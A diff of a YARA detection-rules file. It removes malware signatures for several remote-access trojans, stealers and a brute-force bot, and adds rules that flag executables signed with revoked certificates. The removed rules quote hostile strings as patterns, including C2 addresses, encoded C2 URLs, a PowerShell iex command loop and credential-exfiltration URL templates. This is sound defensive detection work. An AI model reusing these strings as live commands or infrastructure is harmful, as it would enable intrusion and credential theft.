 		score = 75
 		quality = 75
 		tags = "FILE"
-
-	strings:
-		$pdb1 = "G:\\VP-S-Fin\\memory\\" ascii
-		$pdb2 = "G:\\VP-S-Fin\\Margulas\\" ascii
-		$pdb3 = "G:\\VP-S-Fin\\remote" ascii
-		$pdb4 = "G:\\VP-S-Fin\\" ascii
-		$s1 = "/C choice /C Y /N /D Y /T 1 & Del " fullword wide
-		$s2 = "strToHash" fullword ascii
-		$s3 = "\\socking" fullword wide
-		$s4 = "\\wininets" fullword wide
-		$s5 = "ClientSocket" fullword ascii
-		$s6 = "new Stream()" fullword wide
-		$s7 = "CipherText" fullword ascii
-		$s8 = "WriteAllBytes" fullword ascii
-		$s9 = { 00 50 72 6f 63 65 73 73 00 45 78 69 73 74 73 00}
-		$s10 = "pxR/THCwdLuruMmw8wB8xAUvbno1yPGBTOV9IoOkAp/n7+paQm74pkzlfSKDpAKfTOV9IoOkAp9M5X0ig6QCn0zlfSKDpAKfTOV9IoOkAp" wide
-		$c1 = "149.248.52.61" wide
-		$c2 = "://vpn.nic.in" wide
-		$c3 = "://www.mod.gov.in/dod/sites/default/files/" wide
+		thumbprint = "885b9f1306850a87598e5230fcae71282042b74e8a14cabb0a904c559b506acb"
+		importance = 20
 
 	condition:
-		uint16( 0 ) == 0x5a4d and ( ( 1 of ( $pdb* ) and ( 1 of ( $c* ) or 3 of ( $s* ) ) ) or ( 1 of ( $c* ) and 3 of ( $s* ) ) or ( 6 of ( $s* ) ) )
+		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "SMART TOYS AND GAMES" and pe.signatures [ i ] . serial == "00:9b:d8:1a:9a:da:f7:1f:1f:f0:81:c1:f4:a0:5d:7f:d7" )
 }
-rule DITEKSHEN_MALWARE_Win_Lilithrat : FILE
+
+rule DITEKSHEN_INDICATOR_KB_CERT_082023879112289Bf351D297Cc8Efcfc : FILE
 {
 	meta:
-		description = "Detects LilithRAT"
+		description = "Detects executables signed with stolen, revoked or invalid certificates"
 		author = "ditekSHen"
-		id = "87e56524-f557-5662-86bc-2b26e7c74aee"
-		date = "2024-11-01"
-		modified = "2024-11-01"
+		id = "292f99be-2eb0-5ad1-bd07-766de7822f1e"
+		date = "2024-10-04"
+		modified = "2024-10-04"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/malware.yar#L6812-L6839"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L2430-L2441"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "1e8ac8a329ff99318e12666ea1d90d21bb9b0dff656a5eb1ce741b940c99afd5"
+		logic_hash = "0747b37139daaba10a17098aeb0c6246290fbd997345de34ce9de8da26d7db05"
 		score = 75
 		quality = 75
 		tags = "FILE"
-		hash1 = "132870a1ae6a0bdecaa52c03cfe97a47df8786f148fa8ca113ac2a8d59e3624a"
-		hash2 = "ab7b6e0b28995bdeea44f20c0aba47f95e1d6ba281af3541cd2c04dc6c2a3ad9"
-		hash3 = "b2eeb487046ba1d341fb964069b7e83027b60003334e04e41b467e35c3d2460f"
-		hash4 = "cebcda044c60b709ba4ee0fa9e1e7011a6ffc17285bcc0948d27f866ec8d8f20"
-
-	strings:
-		$pdb1 = "c:\\Users\\Groovi\\Documents\\Visual Studio 2008\\Projects\\TestDll\\" ascii
-		$pdb2 = "C:\\Users\\iceberg\\Downloads\\RAT-Server-master\\RAT-Server-master\\RAT\\Debug\\RAT.pdb" ascii
-		$pdb3 = "C:\\Users\\Samy\\Downloads\\Compressed\\Lilith-master\\Debug\\Lilith.pdb" ascii
-		$s1 = "log.txt" fullword ascii
-		$s2 = "keylog.txt" fullword ascii
-		$s3 = "File Listing Completed Successfully." fullword ascii
-		$s4 = "Download Execute" fullword ascii
-		$s5 = "File Downloaded and Executed Successfully." fullword ascii
-		$s6 = "C:\\WINDOWS\\system32\\cmd.exe" fullword ascii
-		$s7 = "CMD session closed" ascii
-		$s8 = "Restart requested: Restarting self" fullword ascii
-		$s9 = "Termination requested: Killing self" fullword ascii
-		$s10 = "Couldn't write to CMD: CMD not open" fullword ascii
-		$s11 = "keydump" fullword ascii
-		$s12 = "remoteControl" fullword ascii
-		$s13 = "packettype" fullword ascii
+		thumbprint = "0eb3382177f26e122e44ddd74df262a45ebe8261029bc21b411958a07b06278a"
+		importance = 20
 
 	condition:
-		uint16( 0 ) == 0x5a4d and ( 1 of ( $pdb* ) or 6 of ( $s* ) or ( 1 of ( $pdb* ) and 4 of ( $s* ) ) )
+		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "STA-R TOV" and pe.signatures [ i ] . serial == "08:20:23:87:91:12:28:9b:f3:51:d2:97:cc:8e:fc:fc" )
 }
-rule DITEKSHEN_MALWARE_Win_Epicenterrat : FILE
+
+rule DITEKSHEN_INDICATOR_KB_CERT_00Ece6Cbf67Dc41635A5E5D075F286Af23 : FILE
 {
 	meta:
-		description = "Detects EpicenterRAT"
+		description = "Detects executables signed with stolen, revoked or invalid certificates"
 		author = "ditekSHen"
-		id = "6abe6e94-d7f5-5f88-96a6-a8fad599ef6a"
-		date = "2024-11-01"
-		modified = "2024-11-01"
+		id = "53312007-179d-547c-8195-0b5d78181300"
+		date = "2024-10-04"
+		modified = "2024-10-04"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/malware.yar#L6841-L6863"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L2443-L2454"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "e9086dff22e301f57c6a9bdb38fbed8e902d5b8ca20a5e5b3cda56db08d5582e"
+		logic_hash = "27ecc138f8d574c15095032c35ad51c00d8b98f21162d1f59f1f9ca9e5b54391"
 		score = 75
 		quality = 75
 		tags = "FILE"
-
-	strings:
-		$pdb1 = "c:\\Users\\Zombie\\Desktop\\MutantNinja\\" ascii
-		$pdb2 = "\\Epicenter Client\\" ascii
-		$s1 = "PROCESS_LIST<%SEP%>" fullword wide
-		$s2 = "GETREADY_RECV_FILE<%SEP%>" fullword wide
-		$s3 = "DISPLAY<%SEP%>" wide
-		$s4 = "GETSCREEN<%SEP%>" fullword wide
-		$s5 = "dumpImageName" fullword ascii
-		$s6 = "dumpLoc" fullword ascii
-		$s7 = "EXPECT<%SEP%>filelist<%SEP%>" fullword wide
-		$s8 = "<%FSEP%>FOLDER<%FSEP%>-<%SEP%>" fullword wide
-		$s9 = "KILLPROC<%SEP%>" fullword wide
-		$s10 = "LAUNCHPROC<%SEP%>" fullword wide
-		$s11 = "cmd.exe /c start /b " fullword wide
-		$s12 = "savservice" fullword wide
-		$s13 = "getvrs" fullword ascii
+		thumbprint = "f1f83c96ab00dcb70c0231d946b6fbd6a01e2c94e8f9f30352bbe50e89a9a51c"
+		importance = 20
 
 	condition:
-		uint16( 0 ) == 0x5a4d and ( 1 of ( $pdb* ) or 5 of ( $s* ) )
+		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "THRANE AGENTUR ApS" and pe.signatures [ i ] . serial == "00:ec:e6:cb:f6:7d:c4:16:35:a5:e5:d0:75:f2:86:af:23" )
 }
-rule DITEKSHEN_MALWARE_Win_Lastconn : FILE
+
+rule DITEKSHEN_INDICATOR_KB_CERT_5Fb6Bae8834Edd8D3D58818Edc86D7D7 : FILE
 {
 	meta:
-		description = "Detects LastConn"
+		description = "Detects executables signed with stolen, revoked or invalid certificates"
 		author = "ditekSHen"
-		id = "18727c30-d84d-5ffa-acd4-2cc54e553604"
-		date = "2024-11-01"
-		modified = "2024-11-01"
+		id = "65f5e05c-f5cd-53ba-b4ec-7f412aa63796"
+		date = "2024-10-04"
+		modified = "2024-10-04"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/malware.yar#L6865-L6894"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L2456-L2467"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "94f5874353d0fb475595373c06a0de91603cad9b435d35dc00febf90608d6b5a"
+		logic_hash = "9cec6eae024d738c68d670fb61f7667bdc156245da83e5d0ae0f2012baa5bc0a"
 		score = 75
 		quality = 75
 		tags = "FILE"
-
-	strings:
-		$s1 = "System.Net.Http.SysSR" fullword wide
-		$s2 = "System.Net.Http.WrSR" fullword wide
-		$s3 = "yyyy'-'MM'-'dd'T'HH':'mm':'ss.FFFFFFFK" fullword wide
-		$s4 = { 63 00 6f 00 6e 00 74 00 65 00 6e 00 74 00 0c 6e
-               00 6f 00 74 00 69 00 66 00 79 00 04 06 12 80 e8
-               05 00 00 12 80 e8 08 75 00 73 00 65 00 72 00 08
-               74 00 65 00 61 00 6d 00 06 61 00 70 00 70 00 0c
-               6e 00 6f 00 61 00 75 00 74 00 68 00 }
-		$s5 = { 68 00 69 00 64 00 64 00 65 00 6e 00 10 64 00 69
-               00 73 00 61 00 6c 00 6c 00 6f 00 77 00 0e 65 00
-               78 00 74 00 65 00 6e 00 64 00 73 00 04 69 00 64
-               00 16 75 00 6e 00 69 00 71 00 75 00 65 00 49 00
-               74 00 65 00 6d 00 73 }
-		$s6 = "<RunFileOnes>d__" ascii
-		$s7 = "<UploadFile>d__" ascii
-		$s8 = "<ChunkUpload>d__" ascii
-		$s9 = "<StartFolder>d__" ascii
-		$s10 = "<ReadFileAlw>d__" ascii
-		$s12 = "<WriteFileToD>d__" ascii
-		$s13 = "<ReadFile>d__" ascii
-		$s14 = "<GetUpload>d__" ascii
-		$s15 = "CDropbox.Api.DropboxRequestHandler+<RequestJsonStringWithRetry>d__" ascii
+		thumbprint = "026868bbc22c6a37094851e0c6f372da90a8776b01f024badb03033706828088"
+		importance = 20
 
 	condition:
-		uint16( 0 ) == 0x5a4d and 12 of them
+		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Tramplink LLC" and pe.signatures [ i ] . serial == "5f:b6:ba:e8:83:4e:dd:8d:3d:58:81:8e:dc:86:d7:d7" )
 }
-rule DITEKSHEN_MALWARE_Win_Crimsonrat : FILE
+
+rule DITEKSHEN_INDICATOR_KB_CERT_6E0Ccbdfb4777E10Ea6221B90Dc350C2 : FILE
 {
 	meta:
-		description = "Detects CrimsonRAT"
+		description = "Detects executables signed with stolen, revoked or invalid certificates"
 		author = "ditekSHen"
-		id = "54c9bbb2-9fa6-5c1f-9272-13255357ddbf"
-		date = "2024-11-01"
-		modified = "2024-11-01"
+		id = "c8f66f21-db29-5a5d-a74d-58c152a17bc3"
+		date = "2024-10-04"
+		modified = "2024-10-04"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/malware.yar#L6896-L6920"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L2469-L2480"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "a40cf09dbaafb2e7b9130af1b40e46b4c38fed6185b16435ad4c118f9e6d56c7"
+		logic_hash = "fee9662133f0a3d88ce97c27f150bcea8faf21b4c4b97f90bb2aae73ee332bb9"
 		score = 75
 		quality = 75
 		tags = "FILE"
-
-	strings:
-		$s1 = "SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run|" fullword wide
-		$s2 = "system volume information|" fullword wide
-		$s3 = "program files (x86)|" fullword wide
-		$s4 = "program files|" fullword wide
-		$s5 = "<SAVE_AUTO<|" fullword wide
-		$s6 = "add_up_files" fullword ascii
-		$s7 = "see_folders" ascii
-		$s8 = "see_files" ascii
-		$s9 = "see_scren" ascii
-		$s10 = "see_recording" ascii
-		$s11 = "see_responce" ascii
-		$s12 = "pull_data" ascii
-		$s13 = "do_process" ascii
-		$s14 = "do_updated" ascii
-		$s15 = "IPSConfig" fullword ascii
-		$s16 = "#Runing|ver#" wide
-		$s17 = "|fileslog=" wide
+		thumbprint = "367b3092fbcd132efdbebabdc7240e29e3c91366f78137a27177315d32a926b9"
+		importance = 20
 
 	condition:
-		uint16( 0 ) == 0x5a4d and 6 of them
+		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "TRAUMALAB INTERNATIONAL APS" and pe.signatures [ i ] . serial == "6e:0c:cb:df:b4:77:7e:10:ea:62:21:b9:0d:c3:50:c2" )
 }
-rule DITEKSHEN_MALWARE_Win_Actionrat : FILE
+
+rule DITEKSHEN_INDICATOR_KB_CERT_1249Aa2Ada4967969B71Ce63Bf187C38 : FILE
 {
 	meta:
-		description = "Detects ActionRAT, CSharp and Delfi variants"
+		description = "Detects executables signed with stolen, revoked or invalid certificates"
 		author = "ditekSHen"
-		id = "ceb4bd65-85c0-5614-a7cb-8f3f2f849eae"
-		date = "2024-11-01"
-		modified = "2024-11-01"
+		id = "3af35255-7583-5463-b130-ebc8abd4803b"
+		date = "2024-10-04"
+		modified = "2024-10-04"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/malware.yar#L6922-L6955"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L2482-L2493"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "1552cda3f02c08582e3dd97df98416635a25005081627097df181bfc6aac4665"
+		logic_hash = "9f8ff46a3b0f5179c2c3b89e82188183fa399c67c3f0ebc28218cf3cb4ce5c70"
 		score = 75
-		quality = 46
+		quality = 75
 		tags = "FILE"
-
-	strings:
-		$x1 = /<action>(connect|command|drives|getfiles|upload|execute|download)<action>/ fullword wide
-		$x2 = "aHR0cDovLzE0NC45MS42NS4xMDAv" wide
-		$x3 = "aHR0cDovL21mYWhvc3QuZGRucy5uZXQv" wide
-		$f1 = "<updateCommand>b__" ascii
-		$f2 = "<getDrives>b__" ascii
-		$f3 = "<getStatus>b__" ascii
-		$f4 = "<getDirectories>b__" ascii
-		$f5 = "<updateUpload>b__" ascii
-		$f6 = "<infinity>b__" ascii
-		$f7 = "<uploadFile>b__" ascii
-		$s1 = "beaconURL" ascii
-		$s2 = "PingReply" ascii
-		$s3 = "updateUpload" ascii
-		$s4 = "updateCommand" ascii
-		$s5 = "runCommand" ascii
-		$s6 = "uploadFile" ascii
-		$s7 = "SELECT * FROM MSFT_NetAdapter WHERE ConnectorPresent = True AND DeviceID = '{0}'" fullword wide
-		$s8 = "SOFTWARE\\Wow6432Node\\Microsoft\\Windows NT\\CurrentVersion" fullword wide
-		$s9 = "Mozilla/3.0" fullword wide
-		$s10 = "|directory|N/A|" fullword wide
-		$s11 = "cmd.exe /c" fullword wide
-		$c1 = /Content-Disposition: form-data; name=(hostname|hid|id|action|secondary)/ fullword wide
-		$c2 = /(classification|updatecs|update|beacon)\.php/ wide
-		$c3 = "Content-Disposition: form-data;name=\"{0}\";filename=\"{1}\"filepath=\"{2}\"" fullword wide
-		$pdb1 = "D:\\Projects\\C#\\HTTP-Simple\\WindowsMediaPlayer - HTTP - " ascii
-		$pdb2 = "\\WindowsMediaPlayer10\\obj\\x86\\Release\\winow4.pdb" ascii
+		thumbprint = "c139076033e8391c85ba05508c4017736a8a7d9c1350e6b5996dd94b374f403c"
+		importance = 20
 
 	condition:
-		uint16( 0 ) == 0x5a4d and ( #x1 > 5 or ( all of ( $f* ) and ( 1 of ( $s* ) or 2 of ( $c* ) ) ) or 7 of ( $s* ) or all of ( $c* ) or ( all of ( $pdb* ) and 4 of them ) or ( 2 of ( $x* ) and 5 of them ) )
+		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Umbrella LLC" and pe.signatures [ i ] . serial == "12:49:aa:2a:da:49:67:96:9b:71:ce:63:bf:18:7c:38" )
 }
-rule DITEKSHEN_MALWARE_Win_Nodachi : FILE
+
+rule DITEKSHEN_INDICATOR_KB_CERT_2Dcd0699Da08915Dde6D044Cb474157C : FILE
 {
 	meta:
-		description = "Detects Nodachi infostealer"
+		description = "Detects executables signed with stolen, revoked or invalid certificates"
 		author = "ditekSHen"
-		id = "bce0c44d-7e75-5c51-ba93-75bd81896921"
-		date = "2024-11-01"
-		modified = "2024-11-01"
+		id = "0b4e1d10-d385-5ca8-b9e2-00341a4c6fd9"
+		date = "2024-10-04"
+		modified = "2024-10-04"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/malware.yar#L6957-L6972"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L2495-L2506"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "c8a262b862a47d5c0c9bd76b722aa4ceb55dd365b5dca35a61318d8a1c53269d"
+		logic_hash = "096cf4bb17aa86821bd8d6c8b9fd603664beb12f54a97a87e660b560bd0fc246"
 		score = 75
 		quality = 75
 		tags = "FILE"
-
-	strings:
-		$x1 = "//AppData//Roaming//kavachdb//kavach.db" ascii
-		$s1 = "/upload/drive/v3/files/{fileId}" ascii
-		$s2 = "main.getTokenFromWeb" ascii
-		$s3 = "main.tokenFromFile" ascii
-		$s4 = "/goLazagne/" ascii
-		$s5 = "/extractor/withoutdrive/main.go" ascii
-		$s6 = "struct { Hostname string \"json:\\\"hostname\\\"\"; EncryptedUsername string \"json:\\\"encryptedUsername\\\"\"; EncryptedPassword string \"json:\\\"encryptedPassword\\\"\" }" ascii
-		$s7 = "C://Users//public//cred.json" ascii
+		thumbprint = "13bf3156e66a57d413455973866102b0a1f6d45a1e6de050ca9dcf16ecafb4e2"
+		importance = 20
 
 	condition:
-		uint16( 0 ) == 0x5a4d and ( ( 1 of ( $x* ) and 3 of ( $s* ) ) or ( 4 of ( $s* ) ) )
+		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "VENTE DE TOUT" and pe.signatures [ i ] . serial == "2d:cd:06:99:da:08:91:5d:de:6d:04:4c:b4:74:15:7c" )
 }
-rule DITEKSHEN_MALWARE_Win_Iamthekingqueenofhearts : FILE
+
+rule DITEKSHEN_INDICATOR_KB_CERT_008D52Fb12A2511E86Bbb0Ba75C517Eab0 : FILE
 {
 	meta:
-		description = "IAmTheKing Queen Of Hearts payload"
+		description = "Detects executables signed with stolen, revoked or invalid certificates"
 		author = "ditekSHen"
-		id = "b8d222f0-b3ce-5143-816b-4bbcde645672"
-		date = "2024-11-01"
-		modified = "2024-11-01"
+		id = "04b78a1c-bb2c-5844-933b-f95a0cc8c71e"
+		date = "2024-10-04"
+		modified = "2024-10-04"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/malware.yar#L6974-L6991"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L2508-L2519"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "0aafeb1dce380ebe6cccc3c7f9564022e1a4cdcf20091943d2bfcc845129152d"
+		logic_hash = "23dc0500af88af0e2c8ea7ff2c5a149d24fb7fd23853c4bf5ee5921a66a34672"
 		score = 75
 		quality = 75
 		tags = "FILE"
-
-	strings:
-		$s1 = "{'session':[{'name':'" ascii
-		$s2 = "begin mainthread ok" wide
-		$s3 = "getcommand error" wide
-		$s4 = "querycode error" wide
-		$s5 = "Code = %d" wide
-		$s6 = "cookie size :%d" wide
-		$s7 = "send request error:%d" wide
-		$s8 = "PmMytex%d" wide
-		$s9 = "%s_%c%c%c%c_%d" wide
-		$s10 = "?what@exception@std@@UBEPBDXZ" ascii
+		thumbprint = "9e918ce337aebb755e23885d928e1a67eca6823934935010e82b561b928df2f9"
+		importance = 20
 
 	condition:
-		uint16( 0 ) == 0x5a4d and 6 of them
+		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "VThink Software Consulting Inc." and pe.signatures [ i ] . serial == "00:8d:52:fb:12:a2:51:1e:86:bb:b0:ba:75:c5:17:ea:b0" )
 }
-rule DITEKSHEN_MALWARE_Win_Iamthekingqueenofclubs : FILE
+
+rule DITEKSHEN_INDICATOR_KB_CERT_00B1Aea98Bf0Ce789B6C952310F14Edde0 : FILE
 {
 	meta:
-		description = "IAmTheKing Queen Of Clubs payload"
+		description = "Detects executables signed with stolen, revoked or invalid certificates"
 		author = "ditekSHen"
-		id = "4d19a484-0483-5b3e-a9ad-1cd8ca263a04"
-		date = "2024-11-01"
-		modified = "2024-11-01"
+		id = "9ab5382f-d768-553c-b52c-88d3a3824459"
+		date = "2024-10-04"
+		modified = "2024-10-04"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/malware.yar#L6993-L7007"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L2521-L2532"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "28d7d3e9a3b7c104fc5b0fa38ce33b34596f16f6987c34a0e2e3fd93a8a908bd"
+		logic_hash = "f7e8a4a0dcd952129e24e8e9351f271d7ea98ffcb7ef9ebe65c27dcc62e6a820"
 		score = 75
 		quality = 75
 		tags = "FILE"
-
-	strings:
-		$s1 = "Not Support!" fullword wide
-		$s2 = "%s|%s|%s|%s" fullword wide
-		$s3 = "cmd.exe" fullword wide
-		$s4 = "for(;;){$S=Get-Content \"%s\";IF($S){\"\" > \"%s\";$t=iex $S 2>\"%s\";$t=$t+' ';echo $t >>\"%s\";}sleep -m " wide
-		$s5 = "PowerShell.exe -nop -c %s" fullword wide
-		$s6 = "%s \"%s\" Df" fullword wide
-		$s7 = "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; SV1; .NET CLR 1.1.4322)" fullword ascii
+		thumbprint = "28324a9746edbdb41c9579032d6eb6ab4fd3e0906f250d4858ce9c5fe5e97469"
+		importance = 20
 
 	condition:
-		uint16( 0 ) == 0x5a4d and 5 of them
+		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Absolut LLC" and pe.signatures [ i ] . serial == "00:b1:ae:a9:8b:f0:ce:78:9b:6c:95:23:10:f1:4e:dd:e0" )
 }
-rule DITEKSHEN_MALWARE_Win_Iamtheking : FILE
+
+rule DITEKSHEN_INDICATOR_KB_CERT_00F097E59809Ae2E771B7B9Ae5Fc3408D7 : FILE
 {
 	meta:
-		description = "IAmTheKing payload"
+		description = "Detects executables signed with stolen, revoked or invalid certificates"
 		author = "ditekSHen"
-		id = "cf0d7c8d-0ac3-542d-b42e-f215af36044b"
-		date = "2024-11-01"
-		modified = "2024-11-01"
+		id = "edd8674d-7d45-5f77-aa47-3fbe32176324"
+		date = "2024-10-04"
+		modified = "2024-10-04"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/malware.yar#L7009-L7029"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L2534-L2545"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "1cc2aa9b672b8519a3e8a22e31403fb7adace0d430f9cab160e9a7d52e56e875"
+		logic_hash = "817876ab8e649b36cac2e7b23d58fe94963c55481fbf3deff7e60a70896af6d0"
 		score = 75
-		quality = 50
+		quality = 75
 		tags = "FILE"
-
-	strings:
-		$s1 = "DeleteFile \"%s\" Failed,Err=%d" wide
-		$s2 = "DeleteFile \"%s\" Success" wide
-		$s3 = "ExcuteFile \"%s\" Failed,Err=%d" wide
-		$s4 = "ExcuteFile \"%s\" Success" wide
-		$s5 = "CreateDownLoadFile \"%s\" Failed,Error=%d" wide
-		$s6 = "uploadFile \"%s\" Failed,errorcode=%d" wide
-		$s7 = "CreateUpLoadFile \"%s\" Success" wide
-		$s8 = "im the king" ascii
-		$s9 = "dont disturb me" fullword ascii
-		$s10 = "kill me or love me" fullword ascii
-		$s11 = "please leave me alone" fullword ascii
-		$s12 = "calculate the NO." fullword ascii
-		$s13 = "\\1-driver-vmsrvc" fullword ascii
+		thumbprint = "22ad7df275c8b5036ea05b95ce5da768049bd2b21993549eed3a8a5ada990b1e"
+		importance = 20
 
 	condition:
-		uint16( 0 ) == 0x5a4d and 7 of them
+		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "ABEL RENOVATIONS, INC." and pe.signatures [ i ] . serial == "00:f0:97:e5:98:09:ae:2e:77:1b:7b:9a:e5:fc:34:08:d7" )
 }
-rule DITEKSHEN_MALWARE_Win_Gobrut : FILE
+
+rule DITEKSHEN_INDICATOR_KB_CERT_2E8023A5A0328F66656E1Fc251C82680 : FILE
 {
 	meta:
-		description = "Detects unknown Go multi-bruteforcer bot (StealthWorker / GoBrut) against multiple systems: QNAP, MagOcart, WordPress, Opencart, Bitrix, Postgers, MySQL, Drupal, Joomla, SSH, FTP, Magneto, CPanel"
+		description = "Detects executables signed with stolen, revoked or invalid certificates"
 		author = "ditekSHen"
-		id = "f5605123-12d9-55d1-8a32-acebf16834f8"
-		date = "2024-11-01"
-		modified = "2024-11-01"
+		id = "192695ab-2f38-5a0b-98ba-5c800f6b9ec1"
+		date = "2024-10-04"
+		modified = "2024-10-04"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/malware.yar#L7031-L7086"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L2547-L2558"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "fb93d0dcf7f38294444ac6d2e1a7a126027ce07f0305af9ae0f8aa8f4b806c5c"
+		logic_hash = "5f0ff46d6cb2a6fe50a4e433dfbf8f62acd92b7c92d922680894fdaee2558d31"
 		score = 75
-		quality = 50
+		quality = 75
 		tags = "FILE"
-
-	strings:
-		$x1 = "/src/StealthWorker/Worker" ascii
-		$x2 = "/go/src/Cloud_Checker/" ascii
-		$x3 = "brutXmlRpc" ascii
-		$s1 = "main.WPBrut" ascii
-		$s2 = "main.WPChecker" ascii
-		$s3 = "main.WooChecker" ascii
-		$s4 = "main.StandartBrut" ascii
-		$s5 = "main.StandartBackup" ascii
-		$s6 = "main.WpMagOcartType" ascii
-		$s7 = "main.StandartAdminFinder" ascii
-		$w1 = "/WorkerQnap_brut/main.go" ascii
-		$w2 = "/WorkerHtpasswd_brut/main.go" ascii
-		$w3 = "/WorkerOpencart_brut/main.go" ascii
-		$w4 = "/WorkerBitrix_brut/main.go" ascii
-		$w5 = "/WorkerPostgres_brut/main.go" ascii
-		$w6 = "/WorkerMysql_brut/main.go" ascii
-		$w7 = "/WorkerFTP_brut/main.go" ascii
-		$w8 = "/WorkerSSH_brut/main.go" ascii
-		$w9 = "/WorkerDrupal_brut/main.go" ascii
-		$w10 = "/WorkerJoomla_brut/main.go" ascii
-		$w11 = "/WorkerMagento_brut/main.go" ascii
-		$w12 = "/WorkerWHM_brut/main.go" ascii
-		$w13 = "/WorkerCpanel_brut/main.go" ascii
-		$w14 = "/WorkerPMA_brut/main.go" ascii
-		$w15 = "/WorkerWP_brut/main.go" ascii
-		$p1 = "%s/project/saveGood?host=%s&login=%s&password=%s&service=cpanel" ascii
-		$p2 = "%s/project/saveGood?host=%s&login=%s&password=%s&service=ftpBrut" ascii
-		$p3 = "%s/project/saveGood?host=%s&login=%s&password=%s&service=mysql_b" ascii
-		$p4 = "%s/project/saveGood?host=%s&login=%s&password=%s&service=qnapBrt" ascii
-		$p5 = "%s/project/saveGood?host=%s&login=%s&password=%s&service=OCartBrt" ascii
-		$p6 = "%s/project/saveGood?host=%s&login=%s&password=%s&service=phpadmin" ascii
-		$p7 = "%s/project/saveGood?host=%s&login=%s&password=%s&service=bitrixBrt" ascii
